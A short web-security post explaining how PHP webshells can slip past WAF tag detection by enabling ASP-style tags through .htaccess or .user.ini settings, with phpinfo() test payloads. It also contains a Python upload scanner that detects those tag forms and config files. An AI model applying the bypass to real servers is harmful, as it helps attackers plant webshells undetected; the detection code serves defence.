Most WAFs detect webshells by checking for PHP tags:

<?php phpinfo();?>

or with short tags:

<?phpinfo();?>

The usual alternative is the script tag:

<script language='php'>phpinfo()</script>

But sometimes that fails too.

How could we find another way?

See the PHP documentation on tags:

http://php.net/manual/en/language.basic-syntax.phptags.php

7.0.0 The ASP tags <%, %>, <%=, and the script tag <script language="php"> are removed from PHP.

ASP tag support is disabled by default,

but .htaccess and .user.ini files allow us to set some PHP configuration directives:

http://www.php.net/manual/en/ini.list.php

PHP_INI_PERDIR: can be set in php.ini, httpd.conf or .htaccess

In Apache, use a .htaccess file:

#example
php_value asp_tags on

Although the documentation only talks about .htaccess, a .user.ini file also works on an nginx server:

asp_tags = On

With that setting in place, this kind of webshell can be used:

<% phpinfo();%>
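
On the detection side, an upload filter has to cover every tag form above and also the per-directory config files that switch them on. The following is an added example, not code from the original post; `scan_upload`, the finding names and the sample uploads are hypothetical and constructed for illustration.

```python
import re

# Every opening-tag form the page lists, not only "<?php".
TAG_PATTERNS = {
    "php_or_short_tag": re.compile(rb"<\?(?!xml\b)", re.I),
    "asp_tag": re.compile(rb"<%"),
    "script_tag": re.compile(rb"<script\s+language\s*=\s*['\"]?php['\"]?", re.I),
}

# Per-directory files that can switch tag styles on (PHP_INI_PERDIR settings).
INI_KEYS = rb"(asp_tags|short_open_tag)"
CONFIG_PATTERNS = {
    ".htaccess": re.compile(rb"^\s*php_(?:value|flag)\s+" + INI_KEYS + rb"\s+(\S+)", re.I | re.M),
    ".user.ini": re.compile(rb"^\s*" + INI_KEYS + rb"\s*=\s*(\S+)", re.I | re.M),
}
ENABLED = {b"on", b"1", b"true", b"yes"}


def scan_upload(filename, data):
    """Return a sorted list of findings for one uploaded file."""
    findings = set()
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if base in CONFIG_PATTERNS:
        findings.add("per_dir_config_upload")
        for m in CONFIG_PATTERNS[base].finditer(data):
            if m.group(2).strip(b"\"'").lower() in ENABLED:
                findings.add("enables_" + m.group(1).decode().lower())
    else:
        for name, pattern in TAG_PATTERNS.items():
            if pattern.search(data):
                findings.add(name)
    return sorted(findings)


# Constructed sample uploads mirroring the snippets on this page.
SAMPLES = {
    "a.php": b"<?php phpinfo();?>",
    "b.php": b"<?phpinfo();?>",
    "c.php": b"<script language='php'>phpinfo()</script>",
    "d.php": b"<% phpinfo();%>",
    "up/.htaccess": b"#example\nphp_value asp_tags on\n",
    "up/.user.ini": b"asp_tags = On\n",
    "feed.xml": b"<?xml version='1.0'?><rss/>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_upload(name, body))
```

The `<%` pattern also matches other template languages (JSP, ERB), so scope it to upload directories served by PHP.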